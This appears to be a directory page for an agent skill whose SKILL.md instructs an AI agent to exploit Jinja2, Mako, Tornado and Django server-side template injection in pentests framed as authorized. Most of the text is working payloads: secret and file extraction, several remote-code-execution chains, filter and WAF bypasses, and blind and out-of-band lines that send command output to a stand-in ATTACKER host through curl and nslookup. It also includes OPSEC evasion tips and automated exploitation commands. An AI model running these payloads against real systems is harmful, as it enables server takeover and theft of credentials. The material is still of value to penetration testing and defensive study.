Agent skill
ssti-jinja2
Guide Jinja2/Python server-side template injection exploitation during authorized penetration testing.
Install this agent skill to your Project
npx add-skill https://github.com/blacklanternsecurity/red-run/tree/main/skills/web/ssti-jinja2
SKILL.md
Jinja2 / Python SSTI
You are helping a penetration tester exploit server-side template injection in a Python application. The target uses Jinja2 (Flask), Mako, Tornado, or Django templates and processes attacker-controlled input through the template engine without proper sanitization. The goal is to escalate from template expression evaluation to remote code execution, file access, or secret extraction. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[ssti-jinja2] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- Confirmed template expression evaluation:
{{7*7}}returns49 - If
{{7*'7'}}returns7777777, the engine is Jinja2. If it returns49, route to ssti-twig. - If
${7*7}works but{{7*7}}does not, check for Mako (${ }syntax). - If
{% import os %}{{os.system('id')}}works directly, the engine is Tornado.
Step 1: Assess
If not already provided, determine:
- Framework — Flask, Django, Tornado, or custom (check error pages, headers)
- Template engine — Jinja2, Mako, Tornado, Django Templates
- Injection point — URL param, form field, header, filename, etc.
- Sandbox restrictions — Are
_,.,[],|,{{filtered?
Skip if context was already provided.
Step 2: Engine Identification
Jinja2 (Flask)
{{7*7}} # 49
{{7*'7'}} # 7777777 (string repetition = Jinja2)
{{config}} # Flask config object (SECRET_KEY, DB credentials)
{{request}} # Flask request object
Mako
${7*7} # 49 (uses ${ } syntax)
<%import os%>${os.popen('id').read()} # Direct Python execution
Tornado
{{7*7}} # 49
{%import os%}{{os.system('id')}} # Direct import
Django Templates
{{7*7}} # Error (Django doesn't evaluate expressions)
{% csrf_token %} # Works in Django, errors in Jinja2
{% debug %} # Dumps context variables
{{ messages.storages.0.signer.key }} # Leaks SECRET_KEY
Step 3: Information Extraction (Jinja2/Flask)
Dump Configuration
{{ config.items() }}
{{ config['SECRET_KEY'] }}
{{ config['SQLALCHEMY_DATABASE_URI'] }}
Dump All Available Context
{% debug %}
{{ self.__dict__ }}
{{ request.environ }}
{{ request.application.__self__._get_data_for_json.__globals__ }}
Read Files (via Flask helpers)
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
Step 4: RCE — Jinja2
Shortest Known Payload (lipsum)
{{ lipsum.__globals__["os"].popen('id').read() }}
Context-Free Payloads (no builtins needed)
These work in any Jinja2 template — no Flask-specific objects required:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
Classic builtins Chain
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
MRO Chain (subclass walk — index varies per Python version)
# Find subprocess.Popen index
{{ ''.__class__.__mro__[1].__subclasses__() }}
# Execute (index 396 is an example — varies per environment)
{{ ''.__class__.mro()[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip() }}
Without Guessing Subclass Index
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen('id').read() }}
{% endif %}
{% endfor %}
Parameterized via GET (command in ?input=id)
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen(request.args.input).read() }}
{% endif %}
{% endfor %}
Blind RCE (force output via Flask hooks)
{{ x.__init__.__builtins__.exec("from flask import current_app, after_this_request
@after_this_request
def hook(*args, **kwargs):
from flask import make_response
r = make_response('Powned')
return r
") }}
Step 5: RCE — Other Python Engines
Mako
Direct Python execution — no sandbox to escape:
<%import os%>${os.popen('id').read()}
# Context-free (shorter)
${self.module.cache.util.os.popen('id').read()}
${self.module.runtime.util.os.popen('id').read()}
Tornado
{% import os %}{{ os.popen('id').read() }}
Django Templates (limited — no direct code execution)
Impact is usually limited to information disclosure:
{% debug %} # Dump context
{{ messages.storages.0.signer.key }} # SECRET_KEY
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}
{{ e.user.get_username }} : {{ e.user.password }}
{% endfor %} # Admin credentials
Step 6: Filter Bypass (Jinja2)
Underscore (_) Blocked
{{ request|attr('\x5f\x5fclass\x5f\x5f') }}
{{ request|attr(["_"*2,"class","_"*2]|join) }}
Dot (.) Blocked
{{ request['__class__']['__mro__'][1] }}
{{ request|attr('__class__')|attr('__mro__')|last }}
Brackets ([]) Blocked
{{ request|attr(request.args.getlist(request.args.l)|join) }}
# URL: ?l=a&a=_&a=_&a=class&a=_&a=_
Quotes Blocked
Use request parameters or hex escapes:
{{ request|attr(request.args.a) }} # ?a=__class__
Most Common Filters Bypass (._|[])
{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')() }}
Without {{ }} (use {% %} blocks)
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()%}{%print(a)%}{%endwith%}
Step 7: Blind / Error-Based / Time-Based SSTI
When output is not directly visible:
Error-Based
{{ cycler.__init__.__globals__.__builtins__.getattr("", "x" + cycler.__init__.__globals__.os.popen('id').read()) }}
Boolean-Based
{{ 1 / (cycler.__init__.__globals__.os.popen("id")._proc.wait() == 0) }}
Time-Based
{{ cycler.__init__.__globals__.os.popen('sleep 5').read() }}
OOB (DNS / HTTP callback)
{{ cycler.__init__.__globals__.os.popen('curl https://ATTACKER/?data=$(id|base64)').read() }}
{{ cycler.__init__.__globals__.os.popen('nslookup $(id|base64).ATTACKER.oastify.com').read() }}
Step 8: Escalate or Pivot
OPSEC Notes
- SSTI payloads execute server-side — they appear in application logs
os.popen()andsubprocess.Popen()create process artifacts- Large MRO traversal payloads may trigger WAF rules
- Use
lipsumorcyclerpayloads (shorter, less suspicious) over MRO chains - Cleanup: no persistent artifacts unless you wrote files
Troubleshooting
Payload Returns Empty or Error
- Check if the application uses
autoescape=True— try|safefilter - Subclass index (e.g.,
[396]) varies per Python version — use thewarningloop instead of hardcoding indices - Jinja2 sandbox may be enabled — try context-free payloads (
cycler,lipsum)
WAF Blocking Payloads
- Use
\x5f\x5finstead of__ - Use
|attr()instead of dot notation - Pass sensitive strings via request parameters (
request.args.cmd) - Try Fenjing for automated WAF bypass:
python -m fenjing crack --url URL --method GET --inputs name
Automated Tools
# SSTImap — automatic SSTI detection and exploitation
python3 sstimap.py -u 'https://TARGET/page?name=test' -s
# tplmap — older but still useful
python2.7 tplmap.py -u 'https://TARGET/page?name=test*' --os-shell
# TInjA — polyglot-based SSTI scanner
tinja url -u "https://TARGET/page?name=test"
# Fenjing — Jinja2 filter bypass specialist (CTF-focused)
python -m fenjing crack --url 'https://TARGET/' --method GET --inputs name
Recommended Agent Skills
Expand your agent's capabilities with these related and highly-rated skills.
credential-recovery
Offline credential and file recovery with hashcat and john. Use when any skill captures hashes (NTLM, Kerberos TGS/AS-REP, shadow, MSCACHE2) or encrypted files (ZIP, Office, PDF, KeePass, SSH key, 7z, RAR). Trigger phrases: "recover this hash", "offline recovery", "john", "hashcat", "zip2john", "password-protected file". Do NOT use for online password attacks (spraying, brute force against services) — use password-spraying instead.
remote-access-enumeration
Enumeration of remote access services: FTP, SSH, RDP, VNC, and WinRM. Checks anonymous access, default credentials, version vulnerabilities, and authentication methods. Use after network-recon identifies remote access ports.
smb-enumeration
SMB share enumeration, access testing, password policy extraction, and content searching. Enumerates shares via null session, guest, and authenticated access. Covers share listing, per-share access testing, MANSPIDER content search, and SMB vulnerability detection (signing, EternalBlue). Use after network-recon identifies SMB ports (139/445).
infrastructure-enumeration
Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection. Checks zone transfers, open relays, default community strings, cipher zero, NFS exports, and web technology fingerprinting. Use after network-recon identifies infrastructure ports.
network-recon
Network reconnaissance, host discovery, port scanning, and OS fingerprinting. Produces a port/service map that the orchestrator uses to route to service-specific enumeration skills.
container-escapes
Container escape, Docker breakout, and Kubernetes exploitation.
Didn't find tool you were looking for?